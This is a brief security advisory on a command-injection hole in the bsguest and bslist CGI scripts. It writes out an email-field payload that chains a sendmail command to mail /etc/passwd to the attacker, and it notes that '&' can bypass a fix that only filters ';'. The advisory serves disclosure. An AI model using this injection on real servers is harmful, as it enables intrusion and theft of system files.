Vulnerability BS Scripts Affected BS Scripts Multiple CGI Description Following has been discovered by Elf. There are a couple of scripts from bsScripts, that have holes in them because the author did not filter out ; from the form input. The scripts that this affects are bsguest (a guestbook script) and bslist (a mailing list script). The hole allows anyone to execute commands on the server. bsguest.cgi =========== BSGuest does not filter out ; resulting in the ability for anyone to execute commands on the server. The attacker just enters his email address as hacker@example.com;/usr/sbin/sendmail hacker@example.com < /etc/passwd It's important to point out that just filtering out the ';' char doesn't fix the problem. Think about using '&' or '&&' instead of it... Solution The author has been informed and the holes are now patched in the latest release.